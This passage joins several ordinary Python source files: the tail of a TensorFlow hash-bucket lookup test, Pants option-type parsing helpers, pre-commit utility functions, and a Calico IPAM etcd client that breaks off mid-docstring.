self.assertAllEqual([5], sp_ids.values._shape_as_list())
sp_ids_ind, sp_ids_val, sp_ids_shape = sess.run(
[sp_ids.indices, sp_ids.values, sp_ids.dense_shape])
self.assertAllEqual(input_indices, sp_ids_ind)
self.assertAllEqual([0, 1, 0, 2, 3], sp_ids_val)
self.assertAllEqual(input_shape, sp_ids_shape)
def testInt64SparseTensor(self):
input_indices = [[0, 0], [0, 1], [2, 0], [2, 2], [3, 0]]
input_shape = [4, 4]
with self.test_session() as sess:
sp_features = sparse_tensor.SparseTensor(
constant_op.constant(input_indices, dtypes.int64),
constant_op.constant([42, 1, 42, -1000, 11], dtypes.int64),
constant_op.constant(input_shape, dtypes.int64))
table = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(
(42, 1, -1000), (0, 1, 2), dtypes.int64, dtypes.int64), -1),
1,
key_dtype=dtypes.int64)
table.init.run()
sp_ids = table.lookup(sp_features)
self.assertAllEqual([5], sp_ids.values._shape_as_list())
sp_ids_ind, sp_ids_val, sp_ids_shape = sess.run(
[sp_ids.indices, sp_ids.values, sp_ids.dense_shape])
self.assertAllEqual(input_indices, sp_ids_ind)
self.assertAllEqual([0, 1, 0, 2, 3], sp_ids_val)
self.assertAllEqual(input_shape, sp_ids_shape)
def testIdTableWithHashBucketsWithInvalidHashers(self):
vocab_file = self._createVocabFile("feat_to_id_4.txt")
with self.test_session():
default_value = -1
vocab_size = 3
oov_buckets = 1
lookup_table = lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size), default_value)
with self.assertRaises(TypeError):
lookup_ops.IdTableWithHashBuckets(
lookup_table, oov_buckets, hasher_spec=1)
table = lookup_ops.IdTableWithHashBuckets(
lookup_table,
oov_buckets,
hasher_spec=lookup_ops.HasherSpec("my-awesome-hash", None))
input_string = constant_op.constant(["brain", "salad", "surgery", "UNK"])
with self.assertRaises(ValueError):
table.lookup(input_string)
with self.assertRaises(ValueError):
table = lookup_ops.IdTableWithHashBuckets(
lookup_table,
oov_buckets,
hasher_spec=lookup_ops.StrongHashSpec([]))
with self.assertRaises(ValueError):
table = lookup_ops.IdTableWithHashBuckets(
lookup_table,
oov_buckets,
hasher_spec=lookup_ops.StrongHashSpec([1, 2, 3]))
with self.assertRaises(TypeError):
table = lookup_ops.IdTableWithHashBuckets(
lookup_table,
oov_buckets,
hasher_spec=lookup_ops.StrongHashSpec([None, 2]))
def testIdTableWithHashBucketsNoInnerTable(self):
with self.test_session():
table = lookup_ops.IdTableWithHashBuckets(None, num_oov_buckets=1)
self.assertIsNone(table.table_ref)
if __name__ == "__main__":
test.main()
| |
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import inspect
import os
import re
import shlex
from enum import Enum
from typing import Iterable, Pattern, Sequence
from pants.option.errors import ParseError
from pants.util.eval import parse_expression
from pants.util.memo import memoized_method
class UnsetBool:
"""A type that can be used as the default value for a bool typed option to indicate un-set.
In other words, `bool`-typed options with a `default=UnsetBool` that are not explicitly set will
have the value `None`, enabling a tri-state.
:API: public
"""
def __init__(self) -> None:
raise NotImplementedError(
"UnsetBool cannot be instantiated. It should only be used as a " "sentinel type."
)
@classmethod
def coerce_bool(cls, value: type[UnsetBool] | bool | None, default: bool) -> bool:
if value is None:
return default
if value is cls:
return default
assert isinstance(value, bool)
return value
def target_option(s: str) -> str:
"""Same type as 'str', but indicates a single target spec.
:API: public
TODO(stuhood): Eagerly convert these to Addresses: see https://rbcommons.com/s/twitter/r/2937/
"""
return s
def _normalize_directory_separators(s: str) -> str:
"""Coalesce runs of consecutive instances of `os.sep` in `s`, e.g. '//' -> '/' on POSIX.
The engine will use paths or target addresses either to form globs or to string-match against, and
including the directory separator '/' multiple times in a row e.g. '//' produces an equivalent
glob as with a single '/', but produces a different actual string, which will cause the engine to
fail to glob file paths or target specs correctly.
TODO: give the engine more control over matching paths so we don't have to sanitize the input!
"""
return os.path.normpath(s)
def dir_option(s: str) -> str:
"""Same type as 'str', but indicates string represents a directory path.
:API: public
"""
return _normalize_directory_separators(s)
def file_option(s: str) -> str:
"""Same type as 'str', but indicates string represents a filepath.
:API: public
"""
return _normalize_directory_separators(s)
def dict_with_files_option(s):
"""Same as 'dict', but fingerprints the file contents of any values which are file paths.
For any value which matches the path of a file on disk, the file path is not fingerprinted -- only
its contents.
:API: public
"""
return DictValueComponent.create(s)
def shell_str(s: str) -> str:
"""A member_type for strings that should be split upon parsing through `shlex.split()`.
For example, the option value `--foo --bar=val` would be split into `['--foo', '--bar=val']`,
and then the parser will safely merge this expanded list with any other values defined for the
option.
:API: public
"""
return s
def memory_size(s: str | int | float) -> int:
"""A string that normalizes the suffixes {GiB, MiB, KiB, B} into the number of bytes.
:API: public
"""
if isinstance(s, (int, float)):
return int(s)
if not s:
raise ParseError("Missing value.")
original = s
s = s.lower().strip()
try:
return int(float(s))
except ValueError:
pass
invalid = ParseError(
f"Invalid value: `{original}`. Expected either a bare number or a number with one of "
f"`GiB`, `MiB`, `KiB`, or `B`."
)
def convert_to_bytes(power_of_2) -> int:
try:
return int(float(s[:-3]) * (2 ** power_of_2)) # type: ignore[index]
except TypeError:
raise invalid
if s.endswith("gib"):
return convert_to_bytes(30)
elif s.endswith("mib"):
return convert_to_bytes(20)
elif s.endswith("kib"):
return convert_to_bytes(10)
elif s.endswith("b"):
try:
return int(float(s[:-1]))
except TypeError:
raise invalid
raise invalid
def _convert(val, acceptable_types):
"""Ensure that val is one of the acceptable types, converting it if needed.
:param val: The value we're parsing (either a string or one of the acceptable types).
:param acceptable_types: A tuple of expected types for val.
:returns: The parsed value.
:raises :class:`pants.options.errors.ParseError`: if there was a problem parsing the val as an
acceptable type.
"""
if isinstance(val, acceptable_types):
return val
return parse_expression(val, acceptable_types, raise_type=ParseError)
def _convert_list(val, member_type, is_enum):
converted = _convert(val, (list, tuple))
if not is_enum:
return converted
return [item if isinstance(item, member_type) else member_type(item) for item in converted]
def _flatten_shlexed_list(shlexed_args: Sequence[str]) -> list[str]:
"""Convert a list of shlexed args into a flattened list of individual args.
For example, ['arg1 arg2=foo', '--arg3'] would be converted to ['arg1', 'arg2=foo', '--arg3'].
"""
return [arg for shlexed_arg in shlexed_args for arg in shlex.split(shlexed_arg)]
class ListValueComponent:
"""A component of the value of a list-typed option.
One or more instances of this class can be merged to form a list value.
A component consists of values to append and values to filter while constructing the final list.
Each component may either replace or modify the preceding component. So that, e.g., a config
file can append to and/or filter the default value list, instead of having to repeat most
of the contents of the default value list.
"""
REPLACE = "REPLACE"
MODIFY = "MODIFY"
# We use a regex to parse the comma-separated lists of modifier expressions (each of which is
# a list or tuple literal preceded by a + or a -). Note that these expressions are technically
# a context-free grammar, but in practice using this regex as a heuristic will work fine. The
# values that could defeat it are extremely unlikely to be encountered in practice.
# If we do ever encounter them, we'll have to replace this with a real parser.
@classmethod
@memoized_method
def _get_modifier_expr_re(cls) -> Pattern[str]:
# Note that the regex consists of a positive lookbehind assertion for a ] or a ),
# followed by a comma (possibly surrounded by whitespace), followed by a
# positive lookahead assertion for [ or (. The lookahead/lookbehind assertions mean that
# the bracket/paren characters don't get consumed in the split.
return re.compile(r"(?<=\]|\))\s*,\s*(?=[+-](?:\[|\())")
@classmethod
def _split_modifier_expr(cls, s: str) -> list[str]:
# This check ensures that the first expression (before the first split point) is a modification.
if s.startswith("+") or s.startswith("-"):
return cls._get_modifier_expr_re().split(s)
return [s]
@classmethod
def merge(cls, components: Iterable[ListValueComponent]) -> ListValueComponent:
"""Merges components into a single component, applying their actions appropriately.
This operation is associative: M(M(a, b), c) == M(a, M(b, c)) == M(a, b, c).
"""
# Note that action of the merged component is MODIFY until the first REPLACE is encountered.
# This guarantees associativity.
action = cls.MODIFY
appends = []
filters = []
for component in components:
if component._action is cls.REPLACE:
appends = component._appends
filters = component._filters
action = cls.REPLACE
elif component._action is cls.MODIFY:
appends.extend(component._appends)
filters.extend(component._filters)
else:
raise ParseError(f"Unknown action for list value: {component._action}")
return cls(action, appends, filters)
def __init__(self, action: str, appends: list, filters: list) -> None:
self._action = action
self._appends = appends
self._filters = filters
@property
def val(self) -> list:
ret = list(self._appends)
for x in self._filters:
# Note: can't do ret.remove(x) because that only removes the first instance of x.
ret = [y for y in ret if y != x]
return ret
@property
def action(self):
return self._action
@classmethod
def create(cls, value, member_type=str) -> ListValueComponent:
"""Interpret value as either a list or something to extend another list with.
Note that we accept tuple literals, but the internal value is always a list.
:param value: The value to convert. Can be an instance of ListValueComponent, a list, a tuple,
a string representation of a list or tuple (possibly prefixed by + or -
indicating modification instead of replacement), or any allowed member_type.
May also be a comma-separated sequence of modifications.
"""
if isinstance(value, cls): # Ensure idempotency.
return value
if isinstance(value, bytes):
value = value.decode()
if isinstance(value, str):
comma_separated_exprs = cls._split_modifier_expr(value)
if len(comma_separated_exprs) > 1:
return cls.merge([cls.create(x) for x in comma_separated_exprs])
action = cls.MODIFY
appends: Sequence[str] = []
filters: Sequence[str] = []
is_enum = inspect.isclass(member_type) and issubclass(member_type, Enum)
if isinstance(value, (list, tuple)): # Ensure we can handle list-typed default values.
action = cls.REPLACE
appends = value
elif value.startswith("[") or value.startswith("("):
action = cls.REPLACE
appends = _convert_list(value, member_type, is_enum)
elif value.startswith("+[") or value.startswith("+("):
appends = _convert_list(value[1:], member_type, is_enum)
elif value.startswith("-[") or value.startswith("-("):
filters = _convert_list(value[1:], member_type, is_enum)
elif is_enum and isinstance(value, str):
appends = _convert_list([value], member_type, True)
elif isinstance(value, str):
appends = [value]
else:
appends = _convert(f"[{value}]", list)
if member_type == shell_str:
appends = _flatten_shlexed_list(appends)
filters = _flatten_shlexed_list(filters)
return cls(action, list(appends), list(filters))
def __repr__(self) -> str:
return f"{self._action} +{self._appends} -{self._filters}"
class DictValueComponent:
"""A component of the value of a dict-typed option.
One or more instances of this class can be merged to form a dict value.
Each component may either replace or extend the preceding component. So that, e.g., a config
file can extend the default value of a dict, instead of having to repeat it.
"""
REPLACE = "REPLACE"
EXTEND = "EXTEND"
@classmethod
def merge(cls, components: Iterable[DictValueComponent]) -> DictValueComponent:
"""Merges components into a single component, applying their actions appropriately.
This operation is associative: M(M(a, b), c) == M(a, M(b, c)) == M(a, b, c).
"""
# Note that action of the merged component is EXTEND until the first REPLACE is encountered.
# This guarantees associativity.
action = cls.EXTEND
val = {}
for component in components:
if component.action is cls.REPLACE:
val = component.val
action = cls.REPLACE
elif component.action is cls.EXTEND:
val.update(component.val)
else:
raise ParseError(f"Unknown action for dict value: {component.action}")
return cls(action, val)
def __init__(self, action: str, val: dict) -> None:
self.action = action
self.val = val
@classmethod
def create(cls, value) -> DictValueComponent:
"""Interpret value as either a dict or something to extend another dict with.
:param value: The value to convert. Can be an instance of DictValueComponent, a dict,
or a string representation (possibly prefixed by +) of a dict.
"""
if isinstance(value, bytes):
value = value.decode()
if isinstance(value, cls): # Ensure idempotency.
action = value.action
val = value.val
elif isinstance(value, dict): # Ensure we can handle dict-typed default values.
action = cls.REPLACE
val = value
elif value.startswith("{"):
action = cls.REPLACE
val = _convert(value, dict)
elif value.startswith("+{"):
action = cls.EXTEND
val = _convert(value[1:], dict)
else:
raise ParseError(f"Invalid dict value: {value}")
return cls(action, dict(val))
def __repr__(self) -> str:
return f"{self.action} {self.val}"
| |
from __future__ import unicode_literals
import contextlib
import errno
import functools
import os
import os.path
import shutil
import stat
import subprocess
import tarfile
import tempfile
import pkg_resources
from pre_commit import five
@contextlib.contextmanager
def cwd(path):
original_cwd = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(original_cwd)
def mkdirp(path):
try:
os.makedirs(path)
except OSError:
if not os.path.exists(path):
raise
def memoize_by_cwd(func):
"""Memoize a function call based on os.getcwd()."""
@functools.wraps(func)
def wrapper(*args):
cwd = os.getcwd()
key = (cwd,) + args
try:
return wrapper._cache[key]
except KeyError:
ret = wrapper._cache[key] = func(*args)
return ret
wrapper._cache = {}
return wrapper
@contextlib.contextmanager
def clean_path_on_failure(path):
"""Cleans up the directory on an exceptional failure."""
try:
yield
except BaseException:
if os.path.exists(path):
rmtree(path)
raise
@contextlib.contextmanager
def noop_context():
yield
def shell_escape(arg):
return "'" + arg.replace("'", "'\"'\"'".strip()) + "'"
def no_git_env():
# Too many bugs dealing with environment variables and GIT:
# https://github.com/pre-commit/pre-commit/issues/300
# In git 2.6.3 (maybe others), git exports GIT_WORK_TREE while running
# pre-commit hooks
# In git 1.9.1 (maybe others), git exports GIT_DIR and GIT_INDEX_FILE
# while running pre-commit hooks in submodules.
# GIT_DIR: Causes git clone to clone wrong thing
# GIT_INDEX_FILE: Causes 'error invalid object ...' during commit
return dict(
(k, v) for k, v in os.environ.items() if not k.startswith('GIT_')
)
@contextlib.contextmanager
def tarfile_open(*args, **kwargs):
"""Compatibility layer because python2.6"""
tf = tarfile.open(*args, **kwargs)
try:
yield tf
finally:
tf.close()
@contextlib.contextmanager
def tmpdir():
"""Contextmanager to create a temporary directory. It will be cleaned up
afterwards.
"""
tempdir = tempfile.mkdtemp()
try:
yield tempdir
finally:
rmtree(tempdir)
def resource_filename(filename):
return pkg_resources.resource_filename(
'pre_commit',
os.path.join('resources', filename),
)
class CalledProcessError(RuntimeError):
def __init__(self, returncode, cmd, expected_returncode, output=None):
super(CalledProcessError, self).__init__(
returncode, cmd, expected_returncode, output,
)
self.returncode = returncode
self.cmd = cmd
self.expected_returncode = expected_returncode
self.output = output
def to_bytes(self):
output = []
for maybe_text in self.output:
if maybe_text:
output.append(
b'\n ' +
five.to_bytes(maybe_text).replace(b'\n', b'\n ')
)
else:
output.append(b'(none)')
return b''.join((
five.to_bytes(
'Command: {0!r}\n'
'Return code: {1}\n'
'Expected return code: {2}\n'.format(
self.cmd, self.returncode, self.expected_returncode
)
),
b'Output: ', output[0], b'\n',
b'Errors: ', output[1], b'\n',
))
def to_text(self):
return self.to_bytes().decode('UTF-8')
if five.PY3: # pragma: no cover
__bytes__ = to_bytes
__str__ = to_text
else:
__str__ = to_bytes
__unicode__ = to_text
def cmd_output(*cmd, **kwargs):
retcode = kwargs.pop('retcode', 0)
stdin = kwargs.pop('stdin', None)
encoding = kwargs.pop('encoding', 'UTF-8')
__popen = kwargs.pop('__popen', subprocess.Popen)
popen_kwargs = {
'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if stdin is not None:
stdin = stdin.encode('UTF-8')
# py2/py3 on windows are more strict about the types here
cmd = [five.n(arg) for arg in cmd]
kwargs['env'] = dict(
(five.n(key), five.n(value))
for key, value in kwargs.pop('env', {}).items()
) or None
popen_kwargs.update(kwargs)
proc = __popen(cmd, **popen_kwargs)
stdout, stderr = proc.communicate(stdin)
if encoding is not None and stdout is not None:
stdout = stdout.decode(encoding)
if encoding is not None and stderr is not None:
stderr = stderr.decode(encoding)
returncode = proc.returncode
if retcode is not None and retcode != returncode:
raise CalledProcessError(
returncode, cmd, retcode, output=(stdout, stderr),
)
return proc.returncode, stdout, stderr
def rmtree(path):
"""On windows, rmtree fails for readonly dirs."""
def handle_remove_readonly(func, path, exc): # pragma: no cover (windows)
excvalue = exc[1]
if (
func in (os.rmdir, os.remove, os.unlink) and
excvalue.errno == errno.EACCES
):
os.chmod(path, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
func(path)
else:
raise
shutil.rmtree(path, ignore_errors=False, onerror=handle_remove_readonly)
| |
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from etcd import EtcdKeyNotFound, EtcdAlreadyExist, EtcdCompareFailed
from netaddr import IPAddress, IPNetwork
import logging
import random
from pycalico.datastore_datatypes import IPPool, IPAMConfig
from pycalico.datastore import DatastoreClient, handle_errors
from pycalico.datastore import (IPAM_HOSTS_PATH,
IPAM_HOST_PATH,
IPAM_HOST_AFFINITY_PATH,
IPAM_BLOCK_PATH,
IPAM_HANDLE_PATH,
IPAM_CONFIG_PATH)
from pycalico.datastore_errors import (DataStoreError,
PoolNotFound,
InvalidBlockSizeError)
from pycalico.block import (AllocationBlock,
get_block_cidr_for_address,
validate_block_size,
BLOCK_PREFIXLEN,
AddressNotAssignedError,
NoHostAffinityError)
from pycalico.handle import (AllocationHandle,
AddressCountTooLow)
from pycalico.util import get_hostname
_log = logging.getLogger(__name__)
_log.addHandler(logging.NullHandler())
RETRIES = 100
KEY_ERROR_RETRIES = 3
class BlockHandleReaderWriter(DatastoreClient):
"""
Can read and write allocation blocks and handles to the data store, as well
as related bits of state.
This class keeps etcd specific code from being in the main IPAMClient
class.
"""
def _read_block(self, block_cidr):
"""
Read the block from the data store.
:param block_cidr: The IPNetwork identifier for a block.
:return: An AllocationBlock object
"""
key = _block_datastore_key(block_cidr)
try:
# Use quorum=True to ensure we don't get stale reads. Without this
# we allow many subtle race conditions, such as creating a block,
# then later reading it and finding it doesn't exist.
result = self.etcd_client.read(key, quorum=True)
except EtcdKeyNotFound:
raise KeyError(str(block_cidr))
block = AllocationBlock.from_etcd_result(result)
return block
def _compare_and_swap_block(self, block):
"""
Write the block using an atomic Compare-and-swap.
"""
# If the block has a db_result, CAS against that.
if block.db_result is not None:
_log.debug("CAS Update block %s", block)
try:
self.etcd_client.update(block.update_result())
except EtcdCompareFailed:
raise CASError(str(block.cidr))
else:
_log.debug("CAS Write new block %s", block)
key = _block_datastore_key(block.cidr)
value = block.to_json()
try:
self.etcd_client.write(key, value, prevExist=False)
except EtcdAlreadyExist:
raise CASError(str(block.cidr))
def _delete_block(self, block):
"""
Delete a block using an atomic delete operation.
Raises CASError if the block has been modified.
"""
try:
self.etcd_client.delete(
block.db_result.key,
prevIndex=block.db_result.modifiedIndex)
except EtcdCompareFailed:
raise CASError(str(block.cidr))
def _get_affine_blocks(self, host, version, pool):
"""
Get the blocks for which this host has affinity.
:param host: The host ID to get affinity for.
:param version: 4 for IPv4, 6 for IPv6.
:param pool: Limit blocks to a specific pool, or pass None to find all
blocks for the specified version.
"""
# Construct the path
path = IPAM_HOST_AFFINITY_PATH % {"host": host,
"version": version}
block_ids = []
try:
result = self.etcd_client.read(path, quorum=True).children
for child in result:
packed = child.key.split("/")
if len(packed) == 9:
# block_ids are encoded 192.168.1.0/24 -> 192.168.1.0-24
# in etcd.
block_ids.append(IPNetwork(packed[8].replace("-", "/")))
except EtcdKeyNotFound:
# Means the path is empty.
pass
# If pool specified, filter to only include ones in the pool.
if pool is not None:
assert isinstance(pool, IPPool)
block_ids = [cidr for cidr in block_ids if cidr in pool]
return block_ids
def _get_host_block_pairs(self, pool):
"""
Get the affine blocks and corresponding host for all affine blocks
within the specified pool.
:param pool: Limit blocks to a specific pool,
:return: List of tuples (host, cidr)
"""
assert isinstance(pool, IPPool)
# Construct the path
hosts_and_blocks = []
try:
result = self.etcd_client.read(IPAM_HOSTS_PATH,
quorum=True,
recursive=True).leaves
for child in result:
packed = child.key.split("/")
if len(packed) == 9:
# block_ids are encoded 192.168.1.0/24 -> 192.168.1.0-24
# in etcd.
host = packed[5]
block_id = IPNetwork(packed[8].replace("-", "/"))
if block_id in pool:
hosts_and_blocks.append((host, block_id))
except EtcdKeyNotFound:
# Means the path is empty.
pass
return hosts_and_blocks
def _new_affine_block(self, host, version, pool, ipam_config):
"""
Create and register a new affine block for the host.
:param host: The host ID to get a block for.
:param version: 4 for IPv4, 6 for IPv6.
:param pool: Limit blocks to a specific pool, or pass None to find all
blocks for the specified version.
:param ipam_config: The global IPAM configuration.
:return: The block CIDR of the new block.
"""
# Get the pools and verify we got a valid one, or none.
ip_pools = self.get_ip_pools(version, ipam=True, include_disabled=False)
if pool is not None:
if pool not in ip_pools:
raise PoolNotFound("Requested pool %s is not configured or has"
"wrong attributes" % pool)
# Confine search to only the one pool.
ip_pools = [pool]
for pool in ip_pools:
for block_cidr in pool.cidr.subnet(BLOCK_PREFIXLEN[version]):
block_id = str(block_cidr)
_log.debug("Checking if block %s is free.", block_id)
key = _block_datastore_key(block_cidr)
try:
_ = self.etcd_client.read(key, quorum=True)
except EtcdKeyNotFound:
_log.debug("Found block %s free.", block_id)
try:
self._claim_block_affinity(host, block_cidr,
ipam_config)
except HostAffinityClaimedError:
# Failed to claim the block because some other host
# has it.
_log.debug("Failed to claim block %s", block_cidr)
continue
# Success!
return block_cidr
raise NoFreeBlocksError()
def _claim_block_affinity(self, host, block_cidr, ipam_config):
"""
Claim a block we think is free.
:param host: The host ID to get a block for.
:param block_cidr: The block CIDR.
:param ipam_config: The global IPAM configuration.
"""
key = _block_host_key(host, block_cidr)
self.etcd_client.write(key, "")
# Create the block.
block = AllocationBlock(block_cidr, host,
ipam_config.strict_affinity)
try:
self._compare_and_swap_block(block)
except CASError:
# Block exists. Read it back to find out its host affinity
block = self._read_block(block_cidr)
if block.host_affinity == host:
# Block is now claimed by us. Some other process on this host
# must have claimed it.
_log.debug("Block %s already claimed by us. Success.",
block_cidr)
return
# Some other host beat us to claiming this block. Clean up.
try:
self.etcd_client.delete(key)
except EtcdKeyNotFound:
# A race exists where another process on the same host could
# have already deleted the key. This is fine as long as the key
# no longer exists.
pass
# Throw a HostAffinityClaimedError to let the caller know the block
# wasn't free after all.
raise HostAffinityClaimedError("Block %s already claimed by %s",
block_cidr, block.host_affinity)
# successfully created the block. Done.
return
def _release_block_affinity(self, host, block_cidr):
"""
Release a block we think is owned by the specified host.
If there are no IPs assigned in the block then delete the block. If
there are IPs assigned, remove affinity of the block from the host.
Raises HostAffinityClaimedError if the block is claimed by a
different host.
Raises KeyError if the block does not exist.
"""
for _ in xrange(RETRIES):
block = self._read_block(block_cidr)
if block.host_affinity != host:
_log.info("Block host affinity is %s (expected %s) - not "
"releasing", block.host_affinity, host)
raise HostAffinityClaimedError(
"Block %s is claimed by %s",
block_cidr, block.host_affinity)
try:
if block.is_empty():
# The block is empty, so just delete the block.
_log.debug("Block is empty - delete block")
self._delete_block(block)
else:
# The block is not empty so remove affinity from the block.
# This prevents the host automatically assigning from this
# block unless we are allowed to overflow into non-affine
# blocks when affine blocks are exhausted, and provided the
# block is still valid (i.e has a corresponding IP Pool).
block.host_affinity = None
self._compare_and_swap_block(block)
except CASError:
# CAS failed. Retry.
continue
# We removed or updated the block successfully, so update the host
# configuration to remove the CIDR.
_log.debug("Removed affinity for block - deleting host key.")
key = _block_host_key(host, block_cidr)
try:
self.etcd_client.delete(key)
except EtcdKeyNotFound:
pass
return
raise RuntimeError("Max retries hit.") # pragma: no cover
def _random_blocks(self, excluded_ids, version, pool):
"""
Get an list of block CIDRs, in random order.
:param excluded_ids: List of IDs that should be excluded.
:param version: The IP version 4, or 6.
:param pool: IPPool to get blocks from, or None to use all pools
:return: An iterator of block CIDRs.
"""
# Get the pools and verify we got a valid one, or none.
ip_pools = self.get_ip_pools(version, ipam=True, include_disabled=False)
if pool is not None:
if pool not in ip_pools:
raise PoolNotFound("Requested pool %s is not configured or has"
"wrong attributes" % pool)
# Confine search to only the one pool.
ip_pools = [pool]
random_blocks = []
i = 0
for pool in ip_pools:
for block_cidr in pool.cidr.subnet(BLOCK_PREFIXLEN[version]):
if block_cidr not in excluded_ids:
# add this block. We use an "inside-out" Fisher-Yates
# shuffle to randomize the list as we create it. See
# http://en.wikipedia.org/wiki/Fisher%E2%80%93Yates_shuffle
j = random.randint(0, i)
if j != i:
random_blocks.append(random_blocks[j])
random_blocks[j] = block_cidr
else:
random_blocks.append(block_cidr)
i += 1
return random_blocks
def _increment_handle(self, handle_id, block_cidr, amount):
"""
Increment the allocation count on the given handle for the given block
by the given amount.
"""
for _ in xrange(RETRIES):
try:
handle = self._read_handle(handle_id)
except KeyError:
# handle doesn't exist. Create it.
handle = AllocationHandle(handle_id)
_ = handle.increment_block(block_cidr, amount)
try:
self._compare_and_swap_handle(handle)
except CASError:
# CAS failed. Retry.
continue
else:
# success!
return
raise RuntimeError("Max retries hit.") # pragma: no cover
def _decrement_handle(self, handle_id, block_cidr, amount):
"""
Decrement the allocation count on the given handle for the given block
by the given amount.
"""
for _ in xrange(RETRIES):
try:
handle = self._read_handle(handle_id)
except KeyError:
# This is bad. The handle doesn't exist, which means something
# really wrong has happened, like DB corruption.
_log.error("Can't decrement block %s on handle %s; it doesn't "
"exist.", str(block_cidr), handle_id)
raise
try:
handle.decrement_block(block_cidr, amount)
except AddressCountTooLow:
# This is also bad. The handle says it has fewer than the
# requested amount of addresses allocated on the block. This
# means the DB is corrupted.
_log.error("Can't decrement block %s on handle %s; too few "
"allocated.", str(block_cidr), handle_id)
raise
try:
self._compare_and_swap_handle(handle)
except CASError:
continue
else:
# Success!
return
raise RuntimeError("Max retries hit.") # pragma: no cover
def _read_handle(self, handle_id):
"""
Read the handle with the given handle ID from the data store.
:param handle_id: The handle ID to read.
:return: AllocationHandle object.
"""
key = _handle_datastore_key(handle_id)
try:
result = self.etcd_client.read(key, quorum=True)
except EtcdKeyNotFound:
raise KeyError(handle_id)
handle = AllocationHandle.from_etcd_result(result)
return handle
def _compare_and_swap_handle(self, handle):
"""
Write the handle using an atomic Compare-and-swap.
"""
# If the handle has a db_result, CAS against that.
if handle.db_result is not None:
_log.debug("Handle %s exists.", handle.handle_id)
if handle.is_empty():
# Handle is now empty. Delete it instead of an update.
_log.debug("Handle %s is empty.", handle.handle_id)
key = _handle_datastore_key(handle.handle_id)
try:
self.etcd_client.delete(
key,
prevIndex=handle.db_result.modifiedIndex)
except EtcdCompareFailed:
raise CASError(handle.handle_id)
else:
_log.debug("Handle %s is not empty.", handle.handle_id)
try:
self.etcd_client.update(handle.update_result())
except EtcdCompareFailed:
raise CASError(handle.handle_id)
else:
_log.debug("CAS Write new handle %s", handle.handle_id)
assert not handle.is_empty(), "Don't write empty handle."
key = _handle_datastore_key(handle.handle_id)
value = handle.to_json()
try:
self.etcd_client.write(key, value, prevExist=False)
except EtcdAlreadyExist:
raise CASError(handle.handle_id)
def _read_blocks(self):
"""
Read all the allocated blocks.
:return: Tuple of
(List of IPv4 AllocationBlocks,
List of IPv6 AllocationBlocks)
"""
blocks = {}
for version in (4, 6):
blocks_path = IPAM_BLOCK_PATH % {"version": version}
try:
leaves = self.etcd_client.read(blocks_path,
quorum=True,
recursive=True).leaves
except EtcdKeyNotFound:
# Path doesn't exist.
blocks[version] = []
else:
# Convert the leaf values to AllocationBlocks. We need to
# handle an empty leaf value because when no pools are
# configured the recursive read returns the parent directory.
blocks[version] = [AllocationBlock.from_etcd_result(leaf) for leaf in leaves
if leaf.value]
return blocks[4], blocks[6]
@handle_errors
def get_ipam_config(self):
"""
Return the deployment specific IPAM configuration.
:param host: The host ID of the config to return.
:return: An IPAMConfig object.
"""
try:
result = self.etcd_client.read(IPAM_CONFIG_PATH)
except EtcdKeyNotFound:
_log.debug("No IPAM Config stored - return default")
return IPAMConfig()
else:
return IPAMConfig.from_json(result.value)
@handle_errors
def set_ipam_config(self, config):
"""
Set the deployment-specific IPAM configuration.
The IPAM configuration may not be changed whilst there are allocation
blocks configured. An IPAMConf
:param config: An IPAMConfig object.
"""
assert isinstance(config, IPAMConfig)
current = self.get_ipam_config()
if current == config:
_log.debug("Configuration has not changed")
return
if not config.strict_affinity and not config.auto_allocate_blocks:
raise IPAMConfigConflictError("Cannot disable 'strict_affinity' "
"and 'auto_allocate_blocks' at the same time.")
# For simplicity, we do not allow the IPAM configuration to be changed
# once there are IPAM blocks configured. This is to prevent mismatches
# in the assignments (e.g. a block is marked as non-strict but the
# global setting is changed to strict - in this case we should update
# existing blocks to strict, but without additional information about
# who owns which IP, it is not possible).
blocksv4, blocksv6 = self._read_blocks()
if blocksv4 or blocksv6:
_log.warning("Cannot change IPAM config while allocations exist")
raise IPAMConfigConflictError("Unable to change global IPAM "
"configuration due to existing IP allocations.")
self.etcd_client.write(IPAM_CONFIG_PATH, config.to_json())
class CASError(DataStoreError):
"""
Compare-and-swap atomic update failed.
"""
pass
class NoFreeBlocksError(DataStoreError):
"""
Tried to get a new block but there are none available.
"""
pass
class HostAffinityClaimedError(DataStoreError):
"""
Tried to set or remove the host affinity of a block which has affinity
claimed by a different host.
"""
pass
class IPAMConfigConflictError(DataStoreError):
"""
Attempt to change IPAM configuration that conflict with existing
allocations.
"""
pass
def _block_datastore_key(block_cidr):
"""
Translate a block CIDR into a datastore key.
:param block_cidr: IPNetwork representing the block
:return: etcd key as a string.
"""
path = IPAM_BLOCK_PATH % {'version': block_cidr.version}
return path + str(block_cidr).replace("/", "-")
def _block_host_key(host, block_cidr):
"""
Translate a block CIDR into the host specific block key. Presence of the
key in the datastore indicates that a host has affinity to a specific
block. No additional data is stored at this key, the true source is the
block itself.
:param block_cidr: IPNetwork representing the block
:return: etcd key as a string.
"""
block_id = str(block_cidr)
path = IPAM_HOST_AFFINITY_PATH % {"host": host,
"version": block_cidr.version}
return path + block_id.replace("/", "-")
def _handle_datastore_key(handle_id):
"""
Translate a handle_id into a datastore key.
:param handle_id: String key
:return: etcd key as string.
"""
return IPAM_HANDLE_PATH + handle_id
class IPAMClient(BlockHandleReaderWriter):
@handle_errors
def auto_assign_ips(self, num_v4, num_v6, handle_id, attributes,
pool=(None, None), host=None):
"""
Automatically pick and assign the given number of IPv4 and IPv6
addresses.
:param num_v4: Number of IPv4 addresses to request
:param num_v6: Number of IPv6 addresses to request
